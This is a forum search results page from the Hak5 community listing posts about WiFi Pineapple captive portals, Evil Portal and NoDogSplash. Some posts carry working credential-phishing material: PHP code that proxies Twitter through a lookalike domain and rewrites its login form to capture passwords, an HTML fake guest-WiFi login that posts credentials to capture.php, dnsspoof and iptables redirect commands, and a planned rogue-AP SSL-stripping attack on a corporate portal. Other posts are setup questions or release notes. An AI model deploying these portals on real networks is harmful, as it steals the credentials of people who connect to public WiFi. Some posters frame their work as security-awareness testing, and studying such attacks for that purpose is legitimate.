Jump to content

Search the Community

Showing results for tags 'captive portal'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 17 results

  1. After playing with the nano for a few days - love the product and can see how this is going to be very useful. Yet there are a few things which through lack of knowledge am struggling to achieve and not even sure if possible ... 1: Symlink - using ln - s /root/portals /sd/portals my nano seems to be still writing to the Root folder and therefore full (lots of resets later and even doing ln -s /root/ /sd/ to everything sits on SD card seems not to work). Is there a way to have everything on the SD card? so when using portal auth etc if does it directly to the card? 2: Landing page - we have a company site and wanting to create a "Security Page" which when company employees are tricked / connected to the nano will send them to an external hosted site / company website. Rather than use a portal so I can just connect the nano to an internet connection and not have to host the portal / as due to point 1 I seem to run out of space and the nano freezes / takes ages to process anything. 3: Captive portals - the default "Evil portal" allows people to authenticate - yet when creating / importing portals the users receive not authorised and therefore close the browser and think they are not connected / yet reopening the browser allows access. Is there any kind soul that could demo the PHP / code I need to add to the portal to auto accept? My PHP skills are poor at best and however many youtube videos I watch I cannot seem to locate the answers to the above, (along with looking around forums etc), I thank you for taking the time to read and appreciate any assistance you may offer. As DNS Spoof does not seem to work against the Iphone / company phones and unable to redirect to a site using this method. Awesome product / having lots of fun - and showing the users how risky captive portals are (they seem to think only other people get hacked) will be a huge bonus as part of the security awareness program. Cheers.
  2. Hello, I just found out android phone sends requests to some Google domain i.e. http://clients1.google.com/ http://clients3.google.com/ http://connectivitycheck.gstatic.com http://connectivitycheck.android.com to check if they are connected to Internet or not. I need to redirect these domains requests made by android to my captive portal in Linux after they are connected to my wifi hosted by my PC. It doesn't matter whether they access internet after redirecting to my CP. I just need to configure my AP to redirect these requests to my CP in linux. How can I do it? I am using Kali Linux 2.0 Thank you
  3. EvilPortal 3.0 is here bring bug fixes and new features! The main focus of this release was to create what I am calling "Targeted Portals" which allow you to direct clients to different portals conditionally based on SSID, MAC, Hostname, or Useragent allowing for a much wider range of attacks. This version will break the portals you have created in the past so keep that in mind when updating. Also, THIS IS NOT A THREAD TO ASK FOR HELP ON WRITING HTML, PHP, OR JAVASCRIPT. THERE ARE OTHER PLACES TO LEARN TO PROGRAM OTHER THAN THIS THREAD. Features Targeted Portals Static Portals Creating/Editing/Activating/Deleting Portals White listings clients by ip address Dynamically adding and revoking authorized clients Live Preview of your portal through the module interface Targeted Portals Targeted Portals allow you to direct clients to different portals conditionally based on SSID, MAC, Hostname, or Useragent allowing for a much wider range of attacks. Creating a Targeted Portal Go to the Portal Workbench in the EvilPortal module Click the drop down menu to the left of the "Portal Name" input box and select "Targeted" Give it a name Click the create new portal button Edit Targeting Rules Click on the name of the portal you just created in list of portals Click the "Target Rule Editor" button in the top right corner of the Work Bench You should see a modal open up titled "Editing Rules for $portalname" with MAC, SSID, HOSTNAME, and USERAGENT sections These sections represent the value that you can create routing conditions for. Under each section you will see a sub-section titled "Exact" and "Regex". These let you create exact rules or rules that will match a pattern. It should also be noted that these conditions are evaluated as an 'or' not an 'and'. The order that they are evaluated in can be change but more on that later. Once you figure out the rule you want to create click the "Add Rule" button You'll see a row appear that says "Key Value", "Destination", and "Remove". Fill out the values for Key Value and Destination. The "Key Value" represents the value that you are checking. For example if the rule is for a SSID the value might be "office-wifi". The "Destination" is the file that is the landing page you are routing clients that match your rule to. If this is an office portal you might want to call it OfficePortal.php. Just remember what you called it because we will need it later. (More on creating these later) The "Remove" button removes the rule Click "Save" at the bottom Creating The Destinations Click the "New File" button in the top right of the work bench. You should see modal open up titled "Creating New FIle". For the "File Name" field type the name of the destination This must be the name you typed in for the destination field when setting up the rules. In this example it was "OfficePortal.php" In the "File Contents" field you will write the code to create your portal. It should be noted that you need to make a post request to /captiveportal/index.php with a redirect destination called "target" in it. In my opinion it is easiest to copy the contents of "default.php" and paste it here as a starting point. Click "Save" at the bottom Important Notes If a client connects and doesn't match any of the conditions you created, they will be routed to "default.php". Currently there is not an easy way to change the order the rules are evaluated in, if you want to change them you have to do it manually via ssh. ssh into your pineapple cd into where your portal is (either /root/portals/$portalname or /sd/portals/$portalname) nano $portalname.ep (replace $portalname with whatever you called your portal) Change the order of the strings in the targeted_rules->rule_order array. The items that come first are evaluated first. Basic Portals Basic Portals are the same oldschool portals that you have come to know in Evil Portal. These are the portals that are created by default and they work in exactly the same way as they used to. Known Bugs HTTPS traffic is not blocked for un-authorized clients (my iptables suck) If you find a bug please create an issue for it the projects Github Repo Change Log Version 3.1 Added ability to write and view logs on a per-portal basis Created method writeLog($message) that writes to the portal log file Created method notify($message) that sends a notification to the web ui Added ability to download files Tab button in file editor will now insert four spaces Revamped the file editor modal Showing file sizes in the portal workbench Various quality of life improvements Version 3.0 Created targeted portals which allow routing clients to different portals based on SSID, MAC, Hostname, or Useragent. Created easy to use interface for setting up targeting rules Added doc strings to all methods in module.php and functions in module.js Made it easy to get the SSID of a client in your portal Added ability to create and move portals on and to the SD card Made IP address in the Authorized and White Listed clients lists clickable Fixed redirection issues Other QOL improvements. Version 2.1 Removed un-needed verbosity Made tab key indent in the editor instead of change elements Added confirmation dialogue box when deleting a portal Created auto-start feature Various other quality of life updates Version 2.0 Captive Portal is now purely iptables (because F*** NoDogSplash) Version 1.0 Install/Remove NoDogSplash Start/Stop NoDogSplash Enable/Disable NoDogSplash Create/Edit/Delete/Active Portals Live Preview portals All panels collapse for a better mobile experience Just one more time for the people in the back; THIS IS NOT A THREAD TO ASK FOR HELP ON WRITING HTML, PHP, OR JAVASCRIPT. THERE ARE OTHER PLACES TO LEARN TO PROGRAM OTHER THAN THIS THREAD.
  4. Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.
  5. Hi All, Proud new owner of a Pineapple mk V here but fairly new user. I'm trying to test a network which is 'Open' and redirects any connected users to a captive portal (requiring AD logins). I'm wondering if it would be possible to perform an attack that does the following: wlan0 broadcasts 'TARGET_SSID' as Open with the same spoofed MAC address/ESSID etc Wlan1 connects to the 'legitimate' 'TARGET_SSID' and connects to the captive portal page When a user connects to the fake TARGET_SSID on wlan0 they should see a SSL-stripped version of the captive portal. Ideally, Once they login, the login should pass through WLAN1 to get internet/network access. If that's occurred successfully, the user should be allowed to browse as per usual while having a SSL-stripping attack performed. I'm not sure how to tie all these attacks together, from what i've been able to read so far, each of these attacks can happen but all happen individually. Could anyone point me in the direction of any guides etc that will help me do this or have any pointers? Many thanks,
  6. Hi everybody, so I’ve been tinkering with dns spoof for the last little bit and have made a nice little php site that works great with the pineapple. It logs credentials looks good ect. I am interested in learning how to write a proper captive portal though, one that releases once credentials have been logged that is , i've done a fair bit of research on google and found some good articles. I am also quite aware of evil portal and no dog splash but for me its not always about the end result, I genuinely want to figure out how it all works on the backend more for curiosity sake then anything. Doe’s anybody know of some good articles to read that would shed some light on how this all works, If so please post up some links? Thank you.
  7. Hello everyone, I have create a very simple html which is the only page i want my clients to see. Like a captive portal but not intrested in giving them internet connection. I am having problems with nodogsplash which does not redirect any traffic when my pineapple is not connected to the internet. I know i can use "Evil Portal" but i am trying to make this manual. I also noticed that nodogsplash is at 0.9_beta9.9.9 but opkg brings 0.9_beta9.9.6 (not only pineapple, openwrt too) Does the pineapple have to be connected to the internet for nodogsplash to work? Is there a way to replicate the iptables rules nodogsplash creates? Is there any good alternative "captive portal manager" you can suggest? My nodogsplash.conf My /etc/config/dhcp Running: nodogsplash -d 7 -f and it stays like this even when clients connect. As an alternative i tried dnsspoof and iptables (one at a time and both together) My spooofhost.conf dnsspoof -i br-lan -f spoofhost.conf iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 172.16.42.1 and iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1 In this case it redirects traffic to 172.16.42.1 but if pineapple is not connected to the internet Android and iPhone Devices cannot betect the "captive portal" and pop the pseudo browser.
  8. I'd love to release this to the Community.. as soon as I get it fixed ;) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR...nsitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>White Pirate WiFi</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { background-image: images/wallpaper-2551827.png); background-repeat: no-repeat; } </style> </head> <script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value) var passwordvalue=encodeURIComponent(document.getElementById("password").value) var parameters="username="+usernamevalue+"&password="+passwordvalue xmlhttp.open("POST", "http://172.16.42.1/capture.php", true) xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded") xmlhttp.send(parameters) } </script> <body text="#FFFFFF" link="#FF0004" vlink="#FF0004" alink="#FF0004"> <center> <br /> <img src="images/Wi-Fi-Alliance.png" alt="" width="200" height="128"><br /> <br /> <p><Strong>Welcome to 'White Pirate' Guest WiFi</Strong></p> <p><br /> </p> <form action="capture" method="post"> <fieldset> <p><strong>Please login using any of the following.</strong></p> <table width="500"> <tr> <td width="20%" colspan="1" align=left>Email</td> <td colspan="3"><input name="username" type="text" id="username" /></td> </tr> <tr> <td colspan="1" align=left>Password</td> <td colspan="3"><input type="password" name="password" id="password" /></td> </tr> <tr> <td><blockquote> <p><img src="images/social-facebook-box-white-icon.png" width="49" height="49" /></p> </blockquote></td> <td width="19%"><blockquote> <p><img src="images/social-yahoo-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="20%"><blockquote> <p><img src="images/social-twitter-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> <td width="41%"><blockquote> <p><img src="images/social-google-box-white-icon.png" width="49" height="49"/></p> </blockquote></td> </tr> </table> </fieldset> </form> <p><br /> </p> <form method="POST" action="http://172.16.42.1/capture.php"> <button type="button" onclick="sendInfo();return false;">Submit</button> </form> </p> </center> </body> </html My issue is just with the button.. making sure it goes to the correct page the user is trying to go to.
  9. Evil Portal is a UI front end for No Dog Splash Captive Portal. It makes it really simple to create a captive portal for whatever your needs are. You can do anything with it from just making someone agree to your terms of use on the pineapple to running some sort of browser exploitation that your clients are forced to visit (remember the laws where you live). This is the Infusion support thread only! DO NOT POST NOT WORKING PORTAL CODE HERE!! If you need help with your HTML please post it in the proper place, which is the Programming forum here. I will not respond to people posting a reply saying "This portal doesn't work whats wrong with it" UPDATE TO 2.3 NOTICE: When updating from a previous version of evil portal to version 2.3 you should reconfigure Evil Portal. To do this is very simple. Go to the "Change Log" tab and click where it says to click to fix the configuration. Alternatively you could do from the command line by issuing "pineapple infusion evilportal fixconfig". After this is complete you should reboot your pineapple. Features Spinning pineapple durring dependency installation Configuration status (shows if Evil Portal has been configured or not) Automatic configuration at the click of a button (w00t) Automatic configuration from the command line NoDogSplash running status NoDogSplash auto-run status New Live Portal View New Dev Portal View Automatically refreshing large tile The small tile is no longer a "live tile" Easy backing up and activation of portals Frequently Asked Questions Q: Does Evil Portal/NoDogSplash support PHP? A: No, if you need to do something in PHP the files will have to be hosted on the webserver in /www on your pineapple and then iframed in or have the user redirected to it. Q: Does the captive portal automatically open when people connect? A: This depends on their device, iOS, and OSX devices automatically open captive portals, android devices typically do not but depending on the ROM running on the phone they might. But this is outside the scope of the Evil Portal infusion. Q: Why isn't the captive portal automatically opening on my iOS device? A: Short answer your pineapple needs to be connected to the internet or dns spoof *.* to 172.16.42.1. Q: Why doesn't this code I wrote work? A: *Sigh* I don't have the time to look at it, please don't post issue with code you write here. Post a thread in the Applications And Programming forum. If you do this you have a much better chance of more people helping you quickly and I will appreciate it. Q: Why can't I get xfinity pineapple working? A: Read the above answer. Xfinity Pineapple is not written or supported by me also it falls under the phishing category which is against the rules on this forum. Media: Videos: https://www.youtube.com/watch?v=zFrXWlMnOqg&list=PLW7RuuSaPPzDgrZINbNkt4ujR7RDTUCMB Change Log 2.3Fixed popups not going away automatically on 2.x firmware Configuration changes that allow the webserver on port 80 to be accessed by un-authenticated users Kmod-sched is no longer required so it is not installed 2.2 Added ability to backup portals for later use Configuration changesNoDogSplash now runs on port 2050 NGINX no longer must be configured in any way A fix config option has been added in the change log tab Fixed error message when there is no internet Fixed issues with installing dependencies in firefox 2.1 Fixed kmod-sched not installing2.0 Initial 2.0 ReleaseShows a message while dependencies are being installed Automatic configuration at the click of a button Automatic configuration from the command line NoDogSplash running status NoDogSplash auto-run status Live Portal Preview Dev Portal Preview Small Tile is no longer a "live tile" NoDogSplash Configuration Changes Made by Evil Portal Demo Portals [THESE ARE NOT IN ANYWAY SUPPORTED PLEASE DON'T POST ABOUT THEM HERE]
  10. Hi I want to install the wifidog package but everytime I get this: root@Pineapple:~# opkg install wifidog Installing wifidog (20090925-1) to root... Downloading http://cloud.wifipineapple.com/mk5/packages/wifidog_20090925-1_ar71xx.ipk. Collected errors: * satisfy_dependencies_for: Cannot satisfy the following dependencies for wifidog: * kernel (= 3.3.8-1-d6597ebf6203328d3519ea3c3371a493) * * opkg_install_cmd: Cannot install package wifidog. I've updated my Mark V to the 1.4.1 firmware and I'm still getting the same result. What I could do? Thanks.
  11. hey guys! So I have my new Evil Portal set up and everything works fine on mobile devices, however, for some reason the computers that connect will not get through to the internet even when I try opening all the ports for Auth and pre auth users, heres the config file. I will attach the splash page as well, possibly didnt apply authuser properly. # # Nodogsplash Configuration File # # Parameter: GatewayInterface # Default: NONE # # GatewayInterface is not autodetected, has no default, and must be set here. # Set GatewayInterface to the interface on your router # that is to be managed by Nodogsplash. # Typically br-lan for the wired and wireless lan on OpenWrt White Russian. # May be br-lan on OpenWrt Kamikaze. # GatewayInterface br-lan # FirewallRuleSet: authenticated-users # # Control access for users after authentication. # These rules are inserted at the beginning of the # FORWARD chain of the router's filter table, and # apply to packets that have come in to the router # over the GatewayInterface from MAC addresses that # have authenticated with Nodogsplash, and that are # destined to be routed through the router. The rules are # considered in order, and the first rule that matches # a packet applies to it. # If there are any rules in this ruleset, an authenticated # packet that does not match any rule is rejected. # N.B.: This ruleset is completely independent of # the preauthenticated-users ruleset. # FirewallRuleSet authenticated-users { # You may want to open access to a machine on a local # subnet that is otherwise blocked (for example, to # serve a redirect page; see RedirectURL). If so, # allow that explicitly here, e.g: FirewallRule allow tcp port 80 to 192.168.254.254 # Your router may have several interfaces, and you # probably want to keep them private from the GatewayInterface. # If so, you should block the entire subnets on those interfaces, e.g.: FirewallRule block to 192.168.0.0/16 FirewallRule block to 10.0.0.0/8 # Typical ports you will probably want to open up include # 53 udp and tcp for DNS, # 80 for http, # 443 for https, # 22 for ssh: FirewallRule allow tcp port 53 FirewallRule allow udp port 53 FirewallRule allow tcp port 80 FirewallRule allow tcp port 443 FirewallRule allow tcp port 22 FirewallRule allow tcp port 1471 FirewallRule allow tcp port 8080 } # end FirewallRuleSet authenticated-users # FirewallRuleSet: preauthenticated-users # # Control access for users before authentication. # These rules are inserted in the PREROUTING chain # of the router's nat table, and in the # FORWARD chain of the router's filter table. # These rules apply to packets that have come in to the # router over the GatewayInterface from MAC addresses that # are not on the BlockedMACList or TrustedMACList, # are *not* authenticated with Nodogsplash. The rules are # considered in order, and the first rule that matches # a packet applies to it. A packet that does not match # any rule here is rejected. # N.B.: This ruleset is completely independent of # the authenticated-users and users-to-router rulesets. # FirewallRuleSet preauthenticated-users { # For preauthenticated users to resolve IP addresses in their initial # request not using the router itself as a DNS server, # you probably want to allow port 53 udp and tcp for DNS. FirewallRule allow tcp port 53 FirewallRule allow udp port 53 # For splash page content not hosted on the router, you # will want to allow port 80 tcp to the remote host here. # Doing so circumvents the usual capture and redirect of # any port 80 request to this remote host. # Note that the remote host's numerical IP address must be known # and used here. # FirewallRule allow tcp port 80 to 123.321.123.321 } # end FirewallRuleSet preauthenticated-users # FirewallRuleSet: users-to-router # # Control access to the router itself from the GatewayInterface. # These rules are inserted at the beginning of the # INPUT chain of the router's filter table, and # apply to packets that have come in to the router # over the GatewayInterface from MAC addresses that # are not on the TrustedMACList, and are destined for # the router itself. The rules are # considered in order, and the first rule that matches # a packet applies to it. # If there are any rules in this ruleset, a # packet that does not match any rule is rejected. # FirewallRuleSet users-to-router { # Nodogsplash automatically allows tcp to GatewayPort, # at GatewayAddress, to serve the splash page. # However you may want to open up other ports, e.g. # 53 for DNS and 67 for DHCP if the router itself is # providing these services. FirewallRule allow udp port 53 FirewallRule allow tcp port 53 FirewallRule allow udp port 67 FirewallRule allow udp port 1471 FirewallRule allow udp port 8080 # You may want to allow ssh, http, and https to the router # for administration from the GatewayInterface. If not, # comment these out. FirewallRule allow tcp port 22 FirewallRule allow tcp port 80 FirewallRule allow tcp port 443 FirewallRule allow tcp port 8080 FirewallRule allow tcp port 1471 } # end FirewallRuleSet users-to-router # EmptyRuleSetPolicy directives # The FirewallRuleSets that NoDogSplash permits are: # # authenticated-users # preauthenticated-users # users-to-router # trusted-users # trusted-users-to-router # # For each of these, an EmptyRuleSetPolicy can be specified. # An EmptyRuleSet policy applies to a FirewallRuleSet if the # FirewallRuleSet is missing from this configuration file, # or if it exists but contains no FirewallRules. # # The possible values of an EmptyRuleSetPolicy are: # allow -- packets are accepted # block -- packets are rejected # passthrough -- packets are passed through to pre-existing firewall rules # # Default EmptyRuleSetPolicies are set as follows: # EmptyRuleSetPolicy authenticated-users passthrough # EmptyRuleSetPolicy preauthenticated-users block # EmptyRuleSetPolicy users-to-router block # EmptyRuleSetPolicy trusted-users allow # EmptyRuleSetPolicy trusted-users-to-router allow # Parameter: GatewayName # Default: NoDogSplash # # Set GatewayName to the name of your gateway. This value # will be available as variable $gatewayname in the splash page source # and in status output from ndsctl, but otherwise doesn't matter. # If none is supplied, the value "NoDogSplash" is used. # # GatewayName NoDogSplash # Parameter: GatewayAddress # Default: Discovered from GatewayInterface # # This should be autodetected on an OpenWRT system, but if not: # Set GatewayAddress to the IP address of the router on # the GatewayInterface. This is the address that the Nodogsplash # server listens on. # # GatewayAddress 192.168.1.1 # Parameter: ExternalInterface # Default: Autodetected from /proc/net/route # # This should be autodetected on a OpenWRT system, but if not: # Set ExtrnalInterface to the 'external' interface on your router, # i.e. the one which provides the default route to the internet. # Typically vlan1 for OpenWRT. # # ExternalInterface vlan1 # Parameter: RedirectURL # Default: none # # After authentication, normally a user is redirected # to their initially requested page. # If RedirectURL is set, the user is redirected to this URL instead. # # RedirectURL http://www.ilesansfil.org/ # Parameter: GatewayPort # Default: 2050 # # Nodogsplash's own http server uses GatewayAddress as its IP address. # The port it listens to at that IP can be set here; default is 2050. # GatewayPort 80 # Parameter: MaxClients # Default: 20 # # Set MaxClients to the maximum number of users allowed to # connect at any time. (Does not include users on the TrustedMACList, # who do not authenticate.) # # MaxClients 20 # ClientIdleTimeout # Parameter: ClientIdleTimeout # Default: 10 # # Set ClientIdleTimeout to the desired of number of minutes # of inactivity before a user is automatically 'deauthenticated'. # # ClientIdleTimeout 10 # Parameter: ClientForceTimeout # Default: 360 # # Set ClientForceTimeout to the desired number of minutes before # a user is automatically 'deauthenticated', whether active or not # # ClientForceTimeout 360 # Parameter: AuthenticateImmediately # Default: no # # Set to yes (or true or 1), to immediately authenticate users # who make a http port 80 request on the GatewayInterface (that is, # do not serve a splash page, just redirect to the user's request, # or to RedirectURL if set). # # AuthenticateImmediately no # Parameter: MACMechanism # Default: block # # Either block or allow. # If 'block', MAC addresses on BlockedMACList are blocked from # authenticating, and all others are allowed. # If 'allow', MAC addresses on AllowedMACList are allowed to # authenticate, and all other (non-trusted) MAC's are blocked. # # MACMechanism block # Parameter: BlockedMACList # Default: none # # Comma-separated list of MAC addresses who will be completely blocked # from the GatewayInterface. Ignored if MACMechanism is allow. # N.B.: weak security, since MAC addresses are easy to spoof. # # BlockedMACList 00:00:DE:AD:BE:EF,00:00:C0:1D:F0:0D # Parameter: AllowedMACList # Default: none # # Comma-separated list of MAC addresses who will not be completely # blocked from the GatewayInterface. Ignored if MACMechanism is block. # N.B.: weak security, since MAC addresses are easy to spoof. # # AllowedMACList 00:00:12:34:56:78 # Parameter: TrustedMACList # Default: none # # Comma-separated list of MAC addresses who are not subject to # authentication, and are not restricted by any FirewallRuleSet. # N.B.: weak security, since MAC addresses are easy to spoof. # # TrustedMACList 00:00:CA:FE:BA:BE, 00:00:C0:01:D0:0D # Parameter: PasswordAuthentication # Default: no # Set to yes (or true or 1), to require a password matching # the Password parameter to be supplied when authenticating. # # # PasswordAuthentication no # Parameter: Password # Default: none # Whitespace delimited string that is compared to user-supplied # password when authenticating. # # # Password nodog # Parameter: UsernameAuthentication # Default: no # Set to yes (or true or 1), to require a username matching # the Username parameter to be supplied when authenticating. # # # UsernameAuthentication no # Parameter: Username # Default: none # Whitespace delimited string that is compared to user-supplied # username when authenticating. # # # Username guest # Parameter: PasswordAttempts # Default: 5 # Integer number of failed password/username entries before # a user is forced to reauthenticate. # # # PasswordAttempts 5 # Parameter: TrafficControl # Default: no # # Set to yes (or true or 1), to enable traffic control in Nodogsplash. # # TrafficControl no # Parameter: DownloadLimit # Default: 0 # # If TrafficControl is enabled, this sets the maximum download # speed to the GatewayInterface, in kilobits per second. # For example if you have an ADSL connection with 768 kbit # download speed, and you want to allow about half of that # bandwidth for the GatewayInterface, set this to 384. # A value of 0 means no download limiting is done. # # DownloadLimit 384 # Parameter: UploadLimit # Default: 0 # # If TrafficControl is enabled, this sets the maximum upload # speed from the GatewayInterface, in kilobits per second. # For example if you have an ADSL connection with 128 kbit # upload speed, and you want to allow about half of that # bandwidth for the GatewayInterface, set this to 64. # A value of 0 means no upload limiting is done. # # UploadLimit 64 # Paramter: GatewayIPRange # Default: 0.0.0.0/0 # # By setting this parameter, you can specify a range of IP addresses # on the GatewayInterface that will be responded to and managed by # Nodogsplash. Addresses outside this range do not have their packets # touched by Nodogsplash at all. # Defaults to 0.0.0.0/0, that is, all addresses. # # GatewayIPRange 0.0.0.0/0 --------------------------------------------------------------------------------------------------------------- Below is the html ---------------------------------------------------------------------------------------------------------------\ <!DOCTYPE html> <html> <head> <meta charset="UTF-8 "HTTP-EQUIV="Pragma" CONTENT="no-cache"> <title>$gatewayname Entry</title> <style> * { margin: 0; padding: 0; } html { background: url($imagesdir/background.jpg) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } #page-wrap { width: 400px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; } p { font: 15px/2 Georgia, Serif; margin: 0 0 30px 0; text-indent: 40px; } </style> </head> <body> <div id="contact-form"> <form id="contact" method="post" action=""> <fieldset> <h3>For Free Wifi enter the information below</h3> <label for="name">Name</label> <input type="text" name="name" placeholder="Full Name" title="Enter your name" class="required"> <label for="email">E-mail</label> <input type="email" name="email" placeholder="yourname@domain.com" title="Enter your e-mail address" class="required email"> <label for="phone">Phone</label> <input type="tel" name="phone" placeholder="ex. (555) 555-5555"> <div style="overflow:auto;height:100px;"> This agreement sets out the terms and conditions on which wireless internet access (the Service) is provided free of charge to you, a guest, vendor, board member or employee of The Financial Services Network (Network). Your access to the Service is completely at the discretion of the Network. Access to the Service may be blocked, suspended, or terminated at any time for any reason including, but not limited to, violation of this Agreement, actions that may lead to liability for the Network, disruption of access to other users or networks, and violation of applicable laws or regulations. The Network reserves the right to monitor and collect information while you are connected to the Service and that the collected information can be used at discretion of the the Network, including sharing the information with any law enforcement agencies, the Network partners and/or the Network vendors. The Network may revise this Agreement at any time. You must accept this Agreement each time you use the Service and it is your responsibility to review it for any changes each time. We reserve the right at all times to withdraw the Service, change the specifications or manner of use of the Service, to change access codes, usernames, passwords or other security information necessary to access the service. Any transmissions through this wireless router are the property of the Network and may be used for educational purposes. All packets captured by this access point may be used for presentation during our conferences. This is a really bad idea, by connecting to open networks you are broadcasting your transmissions openly to anyone who may want to steal them. IF YOU DO NOT AGREE WITH THESE TERMS, INCLUDING CHANGES THERETO, DO NOT ACCESS OR USE THE SERVICE. </div> <a href="$authtarget"> <img src="$imagesdir/continue.png" width="280"height="114"border="0" alt="Click to enter" title="Click to enter"> </a> </fieldset> </form> </div><!-- /end #contact-form --> <style type="text/css" style="display: none !important;"> * { margin: 0; padding: 0; } body { overflow-x: hidden; } #demo-top-bar { text-align: left; background: #222; position: relative; zoom: 1; width: 100% !important; z-index: 6000; padding: 20px 0 20px; } #demo-bar-inside { width: 960px; margin: 0 auto; position: relative; } #demo-bar-buttons { padding-top: 10px; float: right; } #demo-bar-buttons a { font-size: 12px; margin-left: 20px; color: white; margin: 2px 0; text-decoration: none; font: 14px "Lucida Grande", Sans-Serif !important; } #demo-bar-buttons a:hover, #demo-bar-buttons a:focus { text-decoration: underline; } #demo-bar-badge { display: inline-block; width: 302px; padding: 0 !important; margin: 0 !important; background-color: transparent !important; } #demo-bar-badge a { display: block; width: 100%; height: 38px; border-radius: 0; bottom: auto; margin: 0; background: url(/images/examples-logo.png) no-repeat; background-size: 100%; overflow: hidden; text-indent: -9999px; } #demo-bar-badge:before, #demo-bar-badge:after { display: none !important; } form#contact fieldset { position: relative; width: 300px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; } form#contact input[type=text], input[type=url], input[type=email], input[type=tel], textarea { margin: 3px 0 0 0; padding: 6px; width: 260px; font-family: arial, sans-serif; font-size: 12px; border: 1px solid #ccc; background: -webkit-gradient(linear, left top, left 15, from(#FFFFFF), color-stop(4%, #f4f4f4), to(#FFFFFF)); background: -moz-linear-gradient(top, #FFFFFF, #f4f4f4 1px, #FFFFFF 15px); } form#contact textarea { width: 275px; height: 150px; } form#contact label { display: block; font-size: 13px; color: #666; margin-top: 10px; font-weight: bold; } form#contact label.error { width: 270px; margin: 3px 0 0 0; display: block; color: #cf0101; font-size: 11px; text-align: right; } form#contact .placeholder { color: #aaa; } form#contact .button { display: inline-block; margin: 15px 0 0 90px; padding: 5px 15px 5px 15px; background-color: #ff9e00; border: none; color: #fff; -moz-border-radius: 15px; -webkit-border-radius: 15px; border-radius: 15px; } form#contact .button:hover { background-color: #fc8500; cursor: pointer; } form#contact .button:active { margin-top: 16px; background-color: #f08004; cursor: pointer; } </style> </body> <script type="text/javascript"> document.getElementById("submit").onclick = function () { location.href = "www.google.com"; }; </script> </html>
  12. Hey guys, I have been working on a presentation over web security and awareness, and one of the things i was going to do was create a captive portal at the conference venue that people would just log into without clearing that it is safe or not. My issue is for some reason my pineapple refuses to install the dependencies from the web portal. I have tried checking for updates (im on 1.4) I have tried flashing, I have trie just about everything. Can someone possibly give me a hint as to what I could try? I'm running on windows, with winSCP and PuTTY. I would love some advice.
  13. Just wanted to share the custom landing page that I created for Nodogsplash and the Evil Portal infusion. You can download the package from the link provided below. The package includes the image files, splash page html code, and my PDS projects. Feel free to customize or improve the files and enjoy! Download the package - http://www.sunstudiophoto.com/pineapple/portal.zip If you need help installing Evil Portal and setting up your captive portal, watch my full-length tutorial - "http://youtu.be/nw4bo4rXGgQ" Here are some screenshots of the portal. The first screenshot shows the portal without any user interaction. The second screenshot shows the portal after the user has scrolled over the accept button (a check mark appears).
